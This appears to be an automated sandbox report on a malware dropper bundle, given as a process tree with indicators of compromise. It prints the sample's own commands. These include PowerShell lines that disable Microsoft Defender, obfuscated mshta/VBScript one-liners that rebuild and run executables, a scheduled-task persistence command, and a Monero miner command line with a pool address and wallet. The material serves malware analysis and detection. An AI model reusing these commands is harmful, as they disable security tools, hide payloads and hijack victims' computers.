PID 1172 wrote to memory of 576	1172	setup_x86_x64_install.exe	28
PID 1172 wrote to memory of 576	1172	setup_x86_x64_install.exe	28
PID 1172 wrote to memory of 576	1172	setup_x86_x64_install.exe	28
PID 576 wrote to memory of 1592	576	setup_installer.exe	29
PID 576 wrote to memory of 1592	576	setup_installer.exe	29
PID 576 wrote to memory of 1592	576	setup_installer.exe	29
PID 576 wrote to memory of 1592	576	setup_installer.exe	29
PID 576 wrote to memory of 1592	576	setup_installer.exe	29
PID 576 wrote to memory of 1592	576	setup_installer.exe	29
PID 576 wrote to memory of 1592	576	setup_installer.exe	29
PID 1592 wrote to memory of 1572	1592	setup_install.exe	31
PID 1592 wrote to memory of 1572	1592	setup_install.exe	31
PID 1592 wrote to memory of 1572	1592	setup_install.exe	31
PID 1592 wrote to memory of 1572	1592	setup_install.exe	31
PID 1592 wrote to memory of 1572	1592	setup_install.exe	31
PID 1592 wrote to memory of 1572	1592	setup_install.exe	31
PID 1592 wrote to memory of 1572	1592	setup_install.exe	31
PID 1592 wrote to memory of 1504	1592	setup_install.exe	32
PID 1592 wrote to memory of 1504	1592	setup_install.exe	32
PID 1592 wrote to memory of 1504	1592	setup_install.exe	32
PID 1592 wrote to memory of 1504	1592	setup_install.exe	32
PID 1592 wrote to memory of 1504	1592	setup_install.exe	32
PID 1592 wrote to memory of 1504	1592	setup_install.exe	32
PID 1592 wrote to memory of 1504	1592	setup_install.exe	32
PID 1592 wrote to memory of 1344	1592	setup_install.exe	33
PID 1592 wrote to memory of 1344	1592	setup_install.exe	33
PID 1592 wrote to memory of 1344	1592	setup_install.exe	33
PID 1592 wrote to memory of 1344	1592	setup_install.exe	33
PID 1592 wrote to memory of 1344	1592	setup_install.exe	33
PID 1592 wrote to memory of 1344	1592	setup_install.exe	33
PID 1592 wrote to memory of 1344	1592	setup_install.exe	33
PID 1592 wrote to memory of 1688	1592	setup_install.exe	34
PID 1592 wrote to memory of 1688	1592	setup_install.exe	34
PID 1592 wrote to memory of 1688	1592	setup_install.exe	34
PID 1592 wrote to memory of 1688	1592	setup_install.exe	34
PID 1592 wrote to memory of 1688	1592	setup_install.exe	34
PID 1592 wrote to memory of 1688	1592	setup_install.exe	34
PID 1592 wrote to memory of 1688	1592	setup_install.exe	34
PID 1592 wrote to memory of 928	1592	setup_install.exe	35
PID 1592 wrote to memory of 928	1592	setup_install.exe	35
PID 1592 wrote to memory of 928	1592	setup_install.exe	35
PID 1592 wrote to memory of 928	1592	setup_install.exe	35
PID 1592 wrote to memory of 928	1592	setup_install.exe	35
PID 1592 wrote to memory of 928	1592	setup_install.exe	35
PID 1592 wrote to memory of 928	1592	setup_install.exe	35
PID 1592 wrote to memory of 1704	1592	setup_install.exe	36
PID 1592 wrote to memory of 1704	1592	setup_install.exe	36
PID 1592 wrote to memory of 1704	1592	setup_install.exe	36
PID 1592 wrote to memory of 1704	1592	setup_install.exe	36
PID 1592 wrote to memory of 1704	1592	setup_install.exe	36
PID 1592 wrote to memory of 1704	1592	setup_install.exe	36
PID 1592 wrote to memory of 1704	1592	setup_install.exe	36
PID 1592 wrote to memory of 1956	1592	setup_install.exe	37
PID 1592 wrote to memory of 1956	1592	setup_install.exe	37
PID 1592 wrote to memory of 1956	1592	setup_install.exe	37
PID 1592 wrote to memory of 1956	1592	setup_install.exe	37
PID 1592 wrote to memory of 1956	1592	setup_install.exe	37
PID 1592 wrote to memory of 1956	1592	setup_install.exe	37
PID 1592 wrote to memory of 1956	1592	setup_install.exe	37
PID 1592 wrote to memory of 1268	1592	setup_install.exe	38

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
PID:1176

C:\Windows\system32\taskhost.exe
"taskhost.exe"
1⤵
PID:1124

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1172
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:576
- - C:\Users\Admin\AppData\Local\Temp\7zS04258146\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS04258146\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1592
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
      4⤵
      PID:1572
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:996
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      PID:1504
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1528
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun03d477f1a31.exe
      4⤵
      Loads dropped DLL
      PID:1344
    - - C:\Users\Admin\AppData\Local\Temp\7zS04258146\Sun03d477f1a31.exe
        
        Sun03d477f1a31.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies system certificate store
        Suspicious use of AdjustPrivilegeToken
        
        PID:1708
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 1388
        6⤵
        Loads dropped DLL
        Program crash
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        
        PID:2560
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun033e271e0ce96c08.exe /mixone
      4⤵
      Loads dropped DLL
      PID:1688
    - - C:\Users\Admin\AppData\Local\Temp\7zS04258146\Sun033e271e0ce96c08.exe
        
        Sun033e271e0ce96c08.exe /mixone
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1972
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "Sun033e271e0ce96c08.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS04258146\Sun033e271e0ce96c08.exe" & exit
        6⤵
        
        PID:2400
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "Sun033e271e0ce96c08.exe" /f
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2460
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun039750b00c.exe
      4⤵
      Loads dropped DLL
      PID:928
    - - C:\Users\Admin\AppData\Local\Temp\7zS04258146\Sun039750b00c.exe
        
        Sun039750b00c.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1372
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCRipt: CLoSE( createOBJeCT ( "wsCript.ShelL").rUn("cMD.exE /R tyPe ""C:\Users\Admin\AppData\Local\Temp\7zS04258146\Sun039750b00c.exe"" > wXE1XgqZIR_W9IM.exE && start WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI & if """" == """" for %m in ( ""C:\Users\Admin\AppData\Local\Temp\7zS04258146\Sun039750b00c.exe"") do taskkill -Im ""%~Nxm"" /F " , 0 , TrUe ))
        6⤵
        
        PID:2156
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /R tyPe "C:\Users\Admin\AppData\Local\Temp\7zS04258146\Sun039750b00c.exe" > wXE1XgqZIR_W9IM.exE && start WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI &if "" == "" for %m in ( "C:\Users\Admin\AppData\Local\Temp\7zS04258146\Sun039750b00c.exe") do taskkill -Im "%~Nxm" /F
        7⤵
        
        PID:1212
        
        C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exE
        
        WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI
        8⤵
        Executes dropped EXE
        
        PID:2520
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCRipt: CLoSE( createOBJeCT ( "wsCript.ShelL").rUn("cMD.exE /R tyPe ""C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exE"" > wXE1XgqZIR_W9IM.exE && start WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI & if ""-PRt0qXDI7zI "" == """" for %m in ( ""C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exE"") do taskkill -Im ""%~Nxm"" /F " , 0 , TrUe ))
        9⤵
        
        PID:2660
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /R tyPe "C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exE" > wXE1XgqZIR_W9IM.exE && start WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI &if "-PRt0qXDI7zI " == "" for %m in ( "C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exE") do taskkill -Im "%~Nxm" /F
        10⤵
        
        PID:1556
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBSCripT: CLOse(CReAteoBjECt ( "wScrIPT.SHeLL"). RuN ( "CmD /C EcHo | sEt /P = ""MZ"" > QKYLkI3.T & CopY /Y /b QKYLkI3.T +KXCn0WxW.e+ 8QfI1D5v.X + 52TbWL.SZV + Y4JTKX.X9 +88N4.I +xU3XyT.P UKHPFGIw.UMV & START msiexec.exe -Y .\UKHPfGIw.UMV " , 0, TRUe ))
        9⤵
        
        PID:2304
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C EcHo | sEt /P = "MZ" > QKYLkI3.T& CopY /Y /b QKYLkI3.T +KXCn0WxW.e+ 8QfI1D5v.X+52TbWL.SZV +Y4JTKX.X9 +88N4.I +xU3XyT.P UKHPFGIw.UMV& START msiexec.exe -Y .\UKHPfGIw.UMV
        10⤵
        
        PID:308
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" EcHo "
        11⤵
        
        PID:2388
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>QKYLkI3.T"
        11⤵
        
        PID:2812
        
        C:\Windows\SysWOW64\msiexec.exe
        
        msiexec.exe -Y .\UKHPfGIw.UMV
        11⤵
        
        PID:2540
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -Im "Sun039750b00c.exe" /F
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2568
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun03f0dc4460bc9.exe
      4⤵
      PID:1704
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun03e4aeb7e43a1c.exe
      4⤵
      Loads dropped DLL
      PID:1956
    - - C:\Users\Admin\AppData\Local\Temp\7zS04258146\Sun03e4aeb7e43a1c.exe
        
        Sun03e4aeb7e43a1c.exe
        5⤵
        Executes dropped EXE
        
        PID:1816
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun0397381f1f458e.exe
      4⤵
      Loads dropped DLL
      PID:1268
    - - C:\Users\Admin\AppData\Local\Temp\7zS04258146\Sun0397381f1f458e.exe
        
        Sun0397381f1f458e.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1368
      - C:\Users\Admin\AppData\Local\Temp\7zS04258146\Sun0397381f1f458e.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS04258146\Sun0397381f1f458e.exe" -u
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1676
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun0324aba28588c0.exe
      4⤵
      Loads dropped DLL
      PID:864
    - - C:\Users\Admin\AppData\Local\Temp\7zS04258146\Sun0324aba28588c0.exe
        
        Sun0324aba28588c0.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:1712
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun038aa349e3318e.exe
      4⤵
      Loads dropped DLL
      PID:560
    - - C:\Users\Admin\AppData\Local\Temp\7zS04258146\Sun038aa349e3318e.exe
        
        Sun038aa349e3318e.exe
        5⤵
        Executes dropped EXE
        Checks computer location settings
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:1784
      - C:\Users\Admin\Pictures\Adobe Films\Szyhqvmcynhy9zCmGhA7LwUm.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\Szyhqvmcynhy9zCmGhA7LwUm.exe"
        6⤵
        Executes dropped EXE
        
        PID:2716
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1784 -s 1536
        6⤵
        Program crash
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        
        PID:3064
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun038db98f99bf9a.exe
      4⤵
      Loads dropped DLL
      PID:1744
    - - C:\Users\Admin\AppData\Local\Temp\7zS04258146\Sun038db98f99bf9a.exe
        
        Sun038db98f99bf9a.exe
        5⤵
        Executes dropped EXE
        Checks computer location settings
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:1796
      - C:\Users\Admin\Pictures\Adobe Films\Szyhqvmcynhy9zCmGhA7LwUm.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\Szyhqvmcynhy9zCmGhA7LwUm.exe"
        6⤵
        Executes dropped EXE
        
        PID:2708
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1796 -s 1036
        6⤵
        Program crash
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        
        PID:2940
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun0351a0558292.exe
      4⤵
      Loads dropped DLL
      PID:584
    - - C:\Users\Admin\AppData\Local\Temp\7zS04258146\Sun0351a0558292.exe
        
        Sun0351a0558292.exe
        5⤵
        Executes dropped EXE
        
        PID:1116
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun03f5d51697d04.exe
      4⤵
      Loads dropped DLL
      PID:1892
    - - C:\Users\Admin\AppData\Local\Temp\7zS04258146\Sun03f5d51697d04.exe
        
        Sun03f5d51697d04.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1628
      - C:\Users\Admin\AppData\Local\Temp\is-H89DL.tmp\Sun03f5d51697d04.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-H89DL.tmp\Sun03f5d51697d04.tmp" /SL5="$A0154,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS04258146\Sun03f5d51697d04.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1268
        
        C:\Users\Admin\AppData\Local\Temp\7zS04258146\Sun03f5d51697d04.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS04258146\Sun03f5d51697d04.exe" /SILENT
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2088
        
        C:\Users\Admin\AppData\Local\Temp\is-6GM4I.tmp\Sun03f5d51697d04.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-6GM4I.tmp\Sun03f5d51697d04.tmp" /SL5="$2017E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS04258146\Sun03f5d51697d04.exe" /SILENT
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        
        PID:2204
        
        C:\Users\Admin\AppData\Local\Temp\is-5V6CV.tmp\postback.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-5V6CV.tmp\postback.exe" ss1
        9⤵
        Executes dropped EXE
        
        PID:2604
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun03ea09aa5c9686e5.exe
      4⤵
      Loads dropped DLL
      PID:960
    - - C:\Users\Admin\AppData\Local\Temp\7zS04258146\Sun03ea09aa5c9686e5.exe
        
        Sun03ea09aa5c9686e5.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1976
      - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        6⤵
        Executes dropped EXE
        
        PID:2832
        
        C:\Users\Admin\AppData\Local\Temp\Chrome5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
        7⤵
        Executes dropped EXE
        
        PID:1632
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
        8⤵
        
        PID:1972
        
        C:\Windows\System32\cmd.exe
        
        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
        9⤵
        
        PID:2640
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
        10⤵
        Creates scheduled task(s)
        
        PID:2024
        
        C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
        9⤵
        
        PID:2572
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        10⤵
        Executes dropped EXE
        
        PID:436
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
        11⤵
        Suspicious use of SetThreadContext
        
        PID:2672
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        12⤵
        Executes dropped EXE
        
        PID:1508
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "/sihost64"
        13⤵
        
        PID:2368
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
        12⤵
        
        PID:3108
        
        C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
        
        "C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2500
        
        C:\Users\Admin\AppData\Roaming\4444390.exe
        
        "C:\Users\Admin\AppData\Roaming\4444390.exe"
        8⤵
        
        PID:2472
        
        C:\Users\Admin\AppData\Roaming\5253619.exe
        
        "C:\Users\Admin\AppData\Roaming\5253619.exe"
        8⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:2436
        
        C:\Users\Admin\AppData\Roaming\3332764.exe
        
        "C:\Users\Admin\AppData\Roaming\3332764.exe"
        8⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:2704
        
        C:\Users\Admin\AppData\Roaming\1090015.exe
        
        "C:\Users\Admin\AppData\Roaming\1090015.exe"
        8⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:2912
        
        C:\Users\Admin\AppData\Roaming\8969508.exe
        
        "C:\Users\Admin\AppData\Roaming\8969508.exe"
        8⤵
        Executes dropped EXE
        
        PID:904
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbsCrIPT: cLOse( CreaTEOBjeCt ( "WsCRiPT.sHelL").RUn ("C:\Windows\system32\cmd.exe /Q /c tYpe ""C:\Users\Admin\AppData\Roaming\8969508.exe"" > seV03VBOUIE.eXe&& StArt sev03VbOUie.exe -POVwq7z4ndmK6x4P & if """" =="""" for %N In (""C:\Users\Admin\AppData\Roaming\8969508.exe"" ) do taskkill -IM ""%~nxN"" /F" , 0 , TrUE ) )
        9⤵
        
        PID:2648
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /Q /c tYpe "C:\Users\Admin\AppData\Roaming\8969508.exe" > seV03VBOUIE.eXe&&StArt sev03VbOUie.exe -POVwq7z4ndmK6x4P & if "" =="" for %N In ("C:\Users\Admin\AppData\Roaming\8969508.exe" ) do taskkill -IM "%~nxN" /F
        10⤵
        
        PID:3208
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -IM "8969508.exe" /F
        11⤵
        Kills process with taskkill
        
        PID:3352
        
        C:\Users\Admin\AppData\Local\Temp\seV03VBOUIE.eXe
        
        sev03VbOUie.exe -POVwq7z4ndmK6x4P
        11⤵
        Executes dropped EXE
        
        PID:3344
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbsCrIPT: cLOse( CreaTEOBjeCt ( "WsCRiPT.sHelL").RUn ("C:\Windows\system32\cmd.exe /Q /c tYpe ""C:\Users\Admin\AppData\Local\Temp\seV03VBOUIE.eXe"" > seV03VBOUIE.eXe&& StArt sev03VbOUie.exe -POVwq7z4ndmK6x4P & if ""-POVwq7z4ndmK6x4P "" =="""" for %N In (""C:\Users\Admin\AppData\Local\Temp\seV03VBOUIE.eXe"" ) do taskkill -IM ""%~nxN"" /F" , 0 , TrUE ) )
        12⤵
        
        PID:3392
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /Q /c tYpe "C:\Users\Admin\AppData\Local\Temp\seV03VBOUIE.eXe" > seV03VBOUIE.eXe&&StArt sev03VbOUie.exe -POVwq7z4ndmK6x4P & if "-POVwq7z4ndmK6x4P " =="" for %N In ("C:\Users\Admin\AppData\Local\Temp\seV03VBOUIE.eXe" ) do taskkill -IM "%~nxN" /F
        13⤵
        
        PID:3692
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vBScrIPt:closE (CreAteObjECt( "wsCRIPT.sheLl" ). rUn ("Cmd /R EcHo | Set /P = ""MZ"" > i61_m6.3i &cOPY /B /Y I61_M6.3I +XvVu.W4A+ Z9NNU.Z + W~cD4C.x + g3Fv7XCY.TZG + 4D8yN3.MnJ FMHAm.5Hv & stArT regsvr32 -s FMHAM.5hV " , 0 , TRuE ) )
        12⤵
        
        PID:3856
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /R EcHo | Set /P = "MZ" > i61_m6.3i &cOPY /B /Y I61_M6.3I +XvVu.W4A+ Z9NNU.Z+W~cD4C.x + g3Fv7XCY.TZG + 4D8yN3.MnJ FMHAm.5Hv & stArT regsvr32 -s FMHAM.5hV
        13⤵
        
        PID:3944
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>i61_m6.3i"
        14⤵
        
        PID:4000
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" EcHo "
        14⤵
        
        PID:3992
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        regsvr32 -s FMHAM.5hV
        14⤵
        
        PID:3172
        
        C:\Users\Admin\AppData\Roaming\6125322.exe
        
        "C:\Users\Admin\AppData\Roaming\6125322.exe"
        8⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:2576
        
        C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        9⤵
        Executes dropped EXE
        
        PID:3372
        
        C:\Users\Admin\AppData\Roaming\1615480.exe
        
        "C:\Users\Admin\AppData\Roaming\1615480.exe"
        8⤵
        Executes dropped EXE
        
        PID:1348
        
        C:\Users\Admin\AppData\Local\Temp\inst1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
        7⤵
        
        PID:2884
        
        C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"
        7⤵
        Executes dropped EXE
        
        PID:2516
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2516 -s 960
        8⤵
        Program crash
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:3796
        
        C:\Users\Admin\AppData\Local\Temp\4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2404
        
        C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        8⤵
        Executes dropped EXE
        
        PID:1688
        
        C:\Users\Admin\AppData\Local\Temp\5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2072
        
        C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
        
        "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
        7⤵
        Executes dropped EXE
        
        PID:1400
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
        8⤵
        
        PID:2528
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
        9⤵
        
        PID:928
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -f -iM "search_hyperfs_206.exe"
        10⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2468
        
        C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
        
        ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
        10⤵
        Executes dropped EXE
        
        PID:2488
        
        C:\Windows\SysWOW64\mshta.exe
        
